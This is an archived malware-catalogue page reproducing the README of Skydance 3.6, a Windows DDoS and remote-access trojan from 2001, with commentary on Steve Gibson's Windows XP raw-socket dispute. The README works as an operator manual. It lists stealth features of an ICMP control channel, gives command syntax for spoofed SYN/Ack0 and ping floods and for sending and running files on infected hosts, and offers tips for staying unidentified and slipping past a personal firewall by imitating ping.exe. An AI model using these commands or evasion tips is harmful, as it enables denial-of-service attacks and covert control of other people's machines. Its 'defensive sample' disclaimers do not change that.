Skydance 3.6

Released 23 years, 4 months ago. July 2001

Copyright © MegaSecurity

By Edrin


Skydance 3.6
Informations
From Germany
Author Edrin
Family Skydance
Category Remote Access
Version Skydance 3.6
Released Date Jul 2001, 23 years, 4 months ago.
Language Microsoft Visual C++
Additional Information
size: 163,897 bytes

Author Information / Description
This is - Skydance 3.6 S.G (Gibson-Version) - by
[email protected]
!

This is README.TXT - Version 1
my homepage is currently down. you can write me a mail if you have some questions.

Disclaimer - Read This First:
	Everything in this document is based on the results i got from developing skydance.
	Skydance 3.6 S.G is an EXAMPLE of a Distributed Denial of Service attack!
	Use SKYDANCE 3.6 S.G SOURCE or README ON YOUR OWN RISK, i will NEVER be
	responsible for any HARM or harmfull things that happen because SKYDANCE
	source was USED! That means I do NOT guarantee for any features and
	security-thing	and i do not guarantee that this program works properly!!!
	Indeed i guarantee for nothing ;)
	
	Use this source only to learn about how to defend/protect against DDoS!
	Do not modify this source and do not give it to another person!
	Use SKYDANCE 3.6 S.G SOURCE AND README ON YOUR OWN RISK!

	suggestions against SKD303DDoS: goto ---> 4. d)

#tested with win98 and win2k
------------------------------------------------------------------------------------------------------

	1. What is it?							
	2. About Steve Gibson, Microsoft and Windows XP			
	3. The source code & changes to version 3.03			
	4. ICMP "ability" of win32 winsock (ICMP�s you can recv)	
	5. Client usage							
	6. Windows firewalls & future of win-based DDoS			


1. What is it?

	Skydance 3.6 S.G (Gibson-Version) is a DDoS sample for win32 using RAW sockets.
	source includes this features:
	- communication with ICMP
	- including a Syn Ack0 flood attack and a simple ping flood attack
	- can not be found with netstat -a (ICMP)
	- can not be found with usual Port-Scanners (RAW) 
	- on win2k/XP-systems communication and attacks are spoofed (IP_HDRINCL:) 
	- server size can be reduced to 17 K
	- client-source can be ported to unix because it is done as console app.
	- (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, executes it after receive.


2. About Steve Gibson, Microsoft and Windows XP	
	In the last weeks you could read many "news" about windows XP and its insecure winsock
	that will allow script kiddies to create dangerous spoofed packets.
	The discussion was started by Steve Gibson who was reading my readme for skydance 3.03
	after he was "already thinking" about this bad feature of win2k/xp�s winsock. Well, i think
	that he accidently found skydance 3.03 when he was searching for some info about these evil
	DDoS-tools that were attacking his pages. But that�s not my point here.

	While the discussion was going on Steve Gibson claimed that Microsoft must be insane to add this
	useless feature to Windows and Microsoft responded (as usual) that there is no threat. There have
	also been some other people who tried to join the discussion like www.theregister.co.uk but finally 
	they play a minor important role.
	Now you might ask "Who of them is right? MS or grc.com?"
	I�m going to answer this question here :) whatever i�m not the highly noticed Gibson or MS.
	
	As usual both sides are too extrem. They have to be because Steve Gibson wants to get mentioned
	in the press and Microsoft does not want bad news about winXP. Of course Steve Gibson is not
	an idiot who is telling storries. In one of the latest posts on his grc.com webpage he published
	a summary that is not too wrong whatever i�m going to add my own point of view to each aspect.

	
				(Taken directly from security wannabe�s homepage)  :[ 

	>------------------------------------------------------------------------------------------------
	>
	> Windows XP's new support of the full raw socket application programming Interface (API) allows 
	> for the creation of fraudulent and damaging Internet traffic. This has never been possible under 
	> Windows without first modifying the operating system with third-party device drivers � which has 
	> never been done by malicious programs.
		
		most of this opinion is true. Whatever i know of one sample for such a VXD (driver)
		that is called "chrome" (or something like this). Indeed every good person that has
		some good knowledge (and good friends ;) about win32 could do such a driver himself.
	
	> The security features built into all other raw socket capable operating systems (Windows 2000, 
	> Unix, Linux, etc.) deliberately restrict raw socket access to applications running with full 
	> "root" privilege. However, the Home Edition of Windows XP executes all applications with full 
	> administrative ("root") privilege. Thus, Windows XP eliminates the raw socket safety restrictions 
	> imposed by all other operating systems. 

		dunno, have never had tried it :/ at least i have no winXP
	
	> For the first time ever, applications running under the Home Edition of Windows XP � whether 
	> deliberately executed or running as hidden "Trojan" programs � will be easily able, without 
	> modifying the operating system in any way, to generate the most damaging forms of Internet 
	> attacks. 

		that�s true, too. SPOOFING (== IP_HDRINCL) is required to do serious dangerous
		forms of attacks like Ack0 floods... all other attacks can be blocked easyly
		Here i want to add one important point. I think there are two ways to have a
		dangerous DDoS-system: 1. You have MANY (irc/icq/ftp) DDoS-bots on dial in 
					  computers that have dynamic IPs.
					  These Bots won�t need the spoofing feature anyway.
					  In addition to that MOST ISPs DO FILTER SPOOFED PACKETS
					  OF DIAL IN COMPUTERS ANYWAY!!!!!
				       2. You have some static-IP webservers. 
		Obviously the IP_HDRINCL will be mostly a problem for WEBSERVERS with static IP.
		It will NOT make every windows machine to a dangerous DDOS-server as he claimed
		somewhere.
 	
	> Internet attacks launched from security-compromised Windows systems are already common. 
	> (Because security-compromised Windows systems are common.) However, the previous Internet 
	> API built into Windows, prevented those attacks from being as damaging as those launched 
	> by Unix and Linux systems. The sole reason for this difference was Windows' previous 
	> lack of full raw socket support. 
 	
		That�s finally his point and he already said that in his first point. 
		Microsoft DOES make a mistake to add the feature to winsock. I agree.

	> No previous version of Windows (9x, ME, or NT) had, or needed, full raw socket support. 
	> Those systems worked seamlessly on the Internet. While there are valid uses for advanced raw 
	> sockets by system level processes (NAT routing, IPsec support, etc.), there is no valid use 
	> for raw sockets by end-user software. The only applications are Internet Research or the 
	> exercise of malice. Therefore, this new danger is without justification. 

		Yeah... I wonder how i could use IP_HDRINCL for something usefull...
		At least nobody needs it. Only for experimental things maybe.

 	> Windows XP's security model, which has been all but eliminated in order to accommodate 
	> the needs of Windows 9x legacy applications, will not prevent the wholesale compromising of 
	> Windows XP machines. These compromised machines � with their needlessly potent full raw 
	> socket support � will be used to attack and damage any chosen Internet user or site. 
	>
	>------------------------------------------------------------------------------------------------

	QX-Mat of Neworder.box.sk reminded me to set the focus again on the main problem: the IP_HDRINCL availbility in
	win2k/XP. This enables people to fake their own address and build Ack0 Syn Flood attacks that can
	NOT be filtered by firewalls as i will explain later in here. Well, dear readers, now you know :)

	If Microsoft would ask me i would suggest to offer the "advanced" winsock that supports
	such features as IP_HDRINCL as an optional free package a user can install if he requires it.
	At least they should add some admin-option to disable the feature in the winsock.
	With most probability nobody will ever need it. Well, maybe some computer-geeks will play with
	it. This opinion was already suggested in several comments to the "winXP&Spoofing"-news on 
	several news-pages.


3. The source code & changes to version 3.03
	In this version i modified the ICMP attack-packet generator and maybe they
	will look more random now.
	Because nobody took the threat of IP_HDRINCL (skydance 3.03 is already a sample for it) serious
	i decided to add an Ack0 flooder. This is an initiation IP packet of type TCP that tells the
	service of a server that a clients wants to connect. TCP is a port-based server	client protocol
	that is used for most secure (i mean without the risk of packet losing) communication like HTTP
	and FTP. To connect to a server for example to download a file the server must offer open ports.

	Now you use the spoofing option and you send 1000 "I want to connect"-packets with 1000 faked
	source IP addresses to the port. While the ISP of the server (router) can block packets 
	(ICMP and UDP blah blah...) like a ping that are less important they can not disable the TCP 
	protocol without stoping the server to offer important services. Now, after the server received
	that "I want to connect"-packet it is going to respond to the non existing fake client "Yeah, 
	everything is fine, i�m cool"-packet. That will eat his bandwith.

	As you can see this is only possible with the ability of faking IPs. For this you need two
	things.	1. An ISP (unlike most dial in ISPs!) that does not block outgoing spoofed packets
		2. a) if you are a leet script kiddie that can code/compile sockets:
					An OS like win2k/xp or linux that supports IP_HDRINCL
		   b) if you are a leet coder who want�s to play with drivers:
					some pizza and much coke.
	
	As you can see it�s not too dificult!
	
	I still did not add a selfinstalling function and/or a cryption to the source because 
	i hope it will remain only a sample code :) hehe


4. ICMP "ability" of win32 winsock (ICMP�s you can recv)
	Blocking each suspicious "ok-ICMP" might block communictation of 
	each win-ICMP-trojan (that is winsock based of course)!!
	I tested it in a few minutes, no warranty, proof it yourself!

	0 Echo reply. 				ok
	1 Reserved. 				ok
	2 Reserved. 				ok
	3 Destination unreachable. 		failed
	4 Source quench. 			failed
	5 Redirect. 				failed
	6 Alternate Host Address. 		ok
	7  					ok
	8 Echo request. 			failed
	9 Router advertisement. 		ok
	10 Router solicitation. 		ok
	11 Time exceeded. 			failed
	12 Parameter problem. 			failed
	13 Timestamp request. 			failed
	14 Timestamp reply. 			ok
	15 Information request. 		ok
	16 Information reply. 			ok
	17 Address mask request. 		failed
	18 Address mask reply. 			ok
	19 Reserved (for security). 		ok
	20					ok
	-					  unknown
	29 Reserved (for robustness experiment).ok
	30 Traceroute. 				ok
	31 Conversion error. 			ok
	32 Mobile Host Redirect. 		ok
	33 IPv6 Where-Are-You. 			ok
	34 IPv6 I-Am-Here. 			ok
	35 Mobile Registration Request. 	ok
	36 Mobile Registration Reply. 		ok
	37 Domain Name request. 		ok
	38 Domain Name reply. 			ok
	39 SKIP Algorithm Discovery Protocol. 	ok
	40 Photuris, Security failures. 	ok
	41					ok
	-					  unknown
	255 Reserved. 				ok


5. Client usage:

	The Client will try to use a spoofed source address. You should test your
	spoofing-ability first to ensure that you can not be revealed. The test
	will fail on WinNT and Win9x/Me systems. It should not fail under Win2000 & XP.

	<spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx
	By default it is 216.32.74.55 = www.yahoo.com
	<pass> must be <= 4 letters!

	- To test spoofing-ability:
	   skd36c spoofing

	- Get Server Info (always unspoofed packets!):
	   skd36c <server> <pass> info
	   Sample: skd36c myknight.com diva info

	- To lauch an attack:
	   skd36c <server> <pass> kill <type> <target> <time-in-minutes> <spoofed-IP>
	   Sample: skd36c myknight.com diva kill ack0 166.166.166.166 10 12.34.56.78
	   <type> must be:  icmp  (icmp attack only)
	                    ack0  (icmp or SynFlood if server supports spoofing)
	   <time-in-minutes> can be up to 1440
	
	- To send and exectue a file with a spoofed standart-windows-pong:
	   skd36c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
	   Sample: skd36c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
	   <file-name> SIZE can be up to 65400 byte, <new-filename> up to 39 letters
	
	DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!


6. Some words about DDoS from Windows OS.
	The new feature IP_HDRINCL that comes with win2k can make windows to a powerful
	DDoS server because it enables IP-spoofing!

	IP_HDRINCL in source:
	--> setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); <--

	That means win2k/XP-servers will become a base for DDoS that is equal to *nix servers.

	Anyway most windows systems remain dial-in computers that have dynamic IP. That means
	such a DDoS as SKD 3.6 S.G can not be used with it in a serious way. I think for such
	Computers the most threatoning DDoS remain IRC-"bots" I already mentioned: most 
	dial in ISPs block outgoing spoofed packets!

	Firewalls that control each winsock access are quite good. They would probably detect
	all malicous winsock based services. 

	I tested out ZoneAlarm again and i found out that it does not only check the application�s
	name and path but also the applications size (and maybe the socket functions they use, too).
	I also found out that win2k does replace a deleted ping.exe in <windir> imediately after it 
	got deleted well, that might work fine if you try to replace it by drag and drop whatever
	doing it within an application or script it does not replace it fast enough.

	That means you might be able to blow a file up to the right size to replace a non-suspicous
	application without having further troubles...

->	Finally i want to add some words about my personal feelings about the stupid winXP 
	discussion:

	As some of you probably already know i tried to remove skydance 3.03 from web a few days 
	after i made it public because i thought it would be better for world.
	I was not happy when i got a mail from megasecurity.org that told me that Steve Gibson
	wrote mails to microsoft and published texts on his webpage where he quoted from my
	readme. Well, i can�t do anything against it anymore. Whole world already knows about
	this stuff now so i think it is ok to publish this skydance now.
	
	I do not know Steve Gibson and i have never talked to him directly. He is probably doing 
	a good job with all the things he does  in TV and Radio... heh
	Well, just joking ;)
	
				(Taken directly from Steve`s great homepage)

	>------------------------------------------------------------------------------------------------
	>
	> Here, located on the "megasecurity" hacker site (provided with their knowledge and permission), 
	> is the entire "readme" page ...
	>
	>------------------------------------------------------------------------------------------------
	
	shouldn�t he ask me? :/

	On his webpage he refered to me and called me a malicious hacker. Well, i am not a malicious hacker.
	I do not flood servers with DDoS nor i do hack any systems. I agree i made a sample application
	that should demonstrate the IP_HDRINCL feature that is now also present in windows. But if this
	makes me to a malicous hacker Steve Gibson is one himself because he claimed that he is going to
	make a sample application, too, hehe
	
Thx for reading,
[email protected]

If you recognize any personal information on this page and wish to have it removed or redacted, please contact us at jplesueur@phrozen.io. We are committed to protecting your privacy in accordance with GDPR regulations.